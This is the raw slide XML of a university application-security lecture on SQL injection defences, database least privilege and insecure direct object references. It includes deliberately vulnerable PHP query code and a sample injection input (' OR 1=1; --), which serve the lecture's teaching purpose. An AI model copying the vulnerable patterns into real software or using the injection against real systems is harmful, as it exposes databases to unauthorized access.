                <a:srgbClr val="91246D"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRP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   IN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lname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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passwd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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(512)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BEGIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="91246D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INSERT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INTO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users (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lastName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email, password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VALUES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fname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lname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email, password);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//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055024" y="2286000"/>
            <a:ext cx="3657600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63177"/>
              <a:gd name="adj2" fmla="val 123372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Must also take away all ad-hoc query rights from the database user.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02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Solving SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reasonable solution #3: switch to using stored procedures.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43200"/>
            <a:ext cx="8213436" cy="33528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DELIMITER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//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CREATE PROCEDURE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create_user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(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   IN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="91246D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(20),</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="91246D"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRP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   IN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lname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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(30),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passwd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9FBF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>VARCHAR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(512)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BEGIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="91246D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INSERT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INTO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users (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lastName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email, password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VALUES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fname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lname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email, password);</a:t>
            </a:r>
          </a:p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//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055024" y="2286000"/>
            <a:ext cx="3657600" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -63177"/>
              <a:gd name="adj2" fmla="val 123372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Must also take away all ad-hoc query rights from the database user.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815582"/>
            <a:ext cx="7696200" cy="23622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db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prepare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CALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>create_user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 (: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firstName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,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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lastName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, :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email, :password)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bindParam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firstName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bindParam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lastName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lastName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bindParam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:email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$email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bindParam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:password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$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password)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$statement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execute()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800600" y="4160676"/>
            <a:ext cx="3657600" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -78482"/>
              <a:gd name="adj2" fmla="val -77731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Must still bind parameters to the stored procedure call or it could still be injectable.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6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General database security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principle of least privilege: databases have users and permission structures as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DO: restrict the database user for the web app to reasonable permissions for each table (e.g. prevent DROP TABLE commands)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DO: consider using RBAC for the connections to the DB (e.g. admin users in the web app connect using admin database credentials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DON’T: use the “root” user in the DB for the standard user.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8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Direct Object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Insecure direct object </a:t>
            </a:r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An authorization issue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A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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6324600"/>
            <a:ext cx="5728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*Source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: https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2997972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Direct Object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Insecure direct object </a:t>
            </a:r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An authorization issue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A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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6324600"/>
            <a:ext cx="5728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*Source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: https://www.owasp.org/index.php/Top_10_2013-Top_10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95621"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4724400" y="2819400"/>
          <a:ext cx="3185476" cy="2260600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="1" bandRow="1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  <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1592738"/>
                <a:gridCol w="1592738"/>
              </a:tblGrid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Exploitability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Prevalence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Impact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anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB2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608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Direct Object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Insecure direct object </a:t>
            </a:r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An authorization issue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743200"/>
            <a:ext cx="7906327" cy="4572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http://www.bank.com/viewBalance?account=1234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429000"/>
            <a:ext cx="7924800" cy="12954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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viewBalance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$acct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$_REQUEST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account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]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$query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SELECT BALANCE FROM ACCOUNTS WHERE ID='$acct'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";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73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Direct Object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Insecure direct object </a:t>
            </a:r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An authorization issue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743200"/>
            <a:ext cx="7906327" cy="4572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http://www.bank.com/viewBalance?account=1234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429000"/>
            <a:ext cx="7924800" cy="12954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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viewBalance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$acct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$_REQUEST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account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]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$query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SELECT BALANCE FROM ACCOUNTS WHERE ID='$acct'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";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09127" y="4876800"/>
            <a:ext cx="4800600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13590"/>
              <a:gd name="adj2" fmla="val -97443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No authentication check for the action. Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applies to static resources like files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, DB, etc).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39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Direct Object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Insecure direct object </a:t>
            </a:r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An authorization issue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743200"/>
            <a:ext cx="7906327" cy="4572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http://www.bank.com/viewBalance?account=1234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429000"/>
            <a:ext cx="7924800" cy="1295400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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viewBalance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$acct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$_REQUEST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account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]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$query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SELECT BALANCE FROM ACCOUNTS WHERE ID='$acct'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";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09127" y="4876800"/>
            <a:ext cx="4800600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13590"/>
              <a:gd name="adj2" fmla="val -97443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No authentication check for the action. Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applies to static resources like files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, DB, etc).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514392" y="2171700"/>
            <a:ext cx="3024673" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20343"/>
              <a:gd name="adj2" fmla="val 106639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(And it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable to SQL injection)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19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Direct Object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Insecure direct object </a:t>
            </a:r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Authorization checks: 3x3 model (remember?)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2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Popular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452688"/>
            <a:ext cx="634365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409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Direct Object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Insecure direct object </a:t>
            </a:r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Authorization checks: 3x3 model (remember?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“What” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Subjects, Objects, Operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“When” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interface, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>submitted, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>granting final access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08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Direct Object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Insecure direct object </a:t>
            </a:r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Authorization checks: 3x3 model (remember?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“What” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Subjects, Objects, Operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“When” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interface, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>submitted, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>granting final access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5168900" cy="319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180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Direct Object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Insecure direct object </a:t>
            </a:r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Authorization checks: 3x3 model (remember?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“What” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Subjects, Objects, Operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“When” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interface, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>submitted, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>granting final access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5168900" cy="319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381000" y="4038600"/>
            <a:ext cx="3177073" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47790"/>
              <a:gd name="adj2" fmla="val -109008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Don’t present unauthorized options in the UI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76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Direct Object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Insecure direct object </a:t>
            </a:r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Authorization checks: 3x3 model (remember?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“What” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Subjects, Objects, Operations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“When” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dimension: Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>loading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interface, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>submitted, Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>granting final access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5168900" cy="319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381000" y="4038600"/>
            <a:ext cx="3177073" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47790"/>
              <a:gd name="adj2" fmla="val -109008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Don’t present unauthorized options in the UI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514600" y="4800600"/>
            <a:ext cx="3177073" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 74809"/>
              <a:gd name="adj2" fmla="val -72273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Check authorization for the action at the start of each controller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18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99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&amp;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Comments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Concerns?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4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Popular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452688"/>
            <a:ext cx="634365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t="12790" r="15789" b="15116"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="1752600"/>
            <a:ext cx="4724400" cy="366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51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4648201"/>
          </a:xfrm>
        </p:spPr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Injection is #1 on the OWASP top 10,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499589"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="1828800"/>
          <a:ext cx="3185476" cy="2260600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="1" bandRow="1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  <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1592738"/>
                <a:gridCol w="1592738"/>
              </a:tblGrid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Exploitability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Prevalence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 anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB20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B20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Impact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Severe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97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4648201"/>
          </a:xfrm>
        </p:spPr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Injection is #1 on the OWASP top 10,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34138"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="1828800"/>
          <a:ext cx="3185476" cy="2260600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="1" bandRow="1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  <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1592738"/>
                <a:gridCol w="1592738"/>
              </a:tblGrid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Exploitability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Prevalence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 anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB20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B20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Impact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Severe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421908"/>
            <a:ext cx="8213436" cy="1293092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pwd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$_REQUEST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password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]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uid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$_REQUEST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userid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]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sql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UPDATE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usertable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 SET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pwd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='$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pwd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' WHERE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uid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='$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uid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';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";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$count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$conn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execute($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sql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33400" y="2895600"/>
            <a:ext cx="4106718" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59879"/>
              <a:gd name="adj2" fmla="val 121406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If this code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in a PHP web app, w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hat could go wrong?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1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4648201"/>
          </a:xfrm>
        </p:spPr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Injection is #1 on the OWASP top 10,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56263"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="1828800"/>
          <a:ext cx="3185476" cy="2260600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstCol="1" bandRow="1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  <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1592738"/>
                <a:gridCol w="1592738"/>
              </a:tblGrid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Exploitability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Prevalence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 anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FFB20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B20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dirty="0" smtClean="0"/>
                        <a:t>Impact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Severe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421908"/>
            <a:ext cx="8213436" cy="1293092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pwd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$_REQUEST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password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]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uid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$_REQUEST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userid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]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sql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 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UPDATE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usertable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 SET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pwd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='$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pwd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' WHERE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uid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='$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uid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';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";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$count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$conn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execute($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sql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33400" y="2895600"/>
            <a:ext cx="4106718" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 59879"/>
              <a:gd name="adj2" fmla="val 121406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If this code is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>in a PHP web app, w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hat could go wrong?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1636" y="2057400"/>
            <a:ext cx="7315200" cy="494146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91246D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>UPDATE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users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SET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pwd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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'foo'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WHERE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uid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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6F6F6F"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>''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91246D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>OR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1=1; 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Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-- $</a:t>
            </a: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Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uid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Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Tahoma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089236" y="3009900"/>
            <a:ext cx="3276600" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52033"/>
              <a:gd name="adj2" fmla="val -83818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Entering a password of “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en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” and a username of “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OR 1=1; -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” yields the above query.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0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An attack against confidentiality, integrity, and availability of everything in your database.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92634"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F74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Todd's Franklin Template</Template>
  <TotalTime>5131</TotalTime>
  <Words>2661</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>407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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 11</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes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Database Security</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Insecure Direct Object References</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>149</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-11-19T22:44:16Z</dcterms:modified>
</cp:coreProperties>
</file>